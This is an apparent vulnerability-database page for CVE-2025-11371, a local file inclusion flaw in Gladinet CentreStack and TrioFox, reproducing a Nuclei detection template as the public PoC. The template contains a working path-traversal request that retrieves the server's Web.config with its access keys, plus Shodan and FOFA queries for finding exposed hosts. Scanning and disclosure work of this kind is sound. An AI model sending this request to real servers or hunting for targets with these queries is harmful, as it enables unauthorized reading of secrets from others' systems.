CVE-2025-11371: Gladinet CentreStack & TrioFox - Local File Inclusion

日期: 2025-08-01 | 影响软件: Gladinet CentreStack TrioFox | POC: 已公开

漏洞描述

In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560

PoC代码[已公开]

id: CVE-2025-11371

info:
  name: Gladinet CentreStack & TrioFox - Local File Inclusion
  author: Kazgangap
  severity: medium
  description: |
    In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild.  This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
  impact: |
    Unauthenticated attackers can disclose sensitive system files, potentially leading to information leakage.
  remediation: |
    Update to a version later than 16.7.10368.56560 or the latest available version.
  reference:
    - https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11371.md
    - https://thehackernews.com/2025/10/from-lfi-to-rce-active-exploitation.html
    - https://nvd.nist.gov/vuln/detail/CVE-2025-11371
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.2
    cve-id: CVE-2025-11371
    cwe-id: CWE-552
    epss-score: 0.56996
    epss-percentile: 0.98021
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"CentreStack"
    fofa-query: "CentreStack - Login"
  tags: cve,cve2025,gladinet,lfi,centrestack,vkev,vuln,kev

http:
  - raw:
      - |
        GET /storage/t.dn?s=..%5C..%5C..%5CProgram+Files+(x86)%5CGladinet+Cloud+Enterprise%5Croot%5CWeb.config&sid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<configuration>", "<system.web>", "AccessKey")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a004830460221008e66a077174cbfe0f39250603cc3be47e5a623e539764778dd4a240a74ad6955022100b8113b43dc43f42f494935e4ed755dc14a221e7c2e2af6e90f559343d74e93c5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-11371.yaml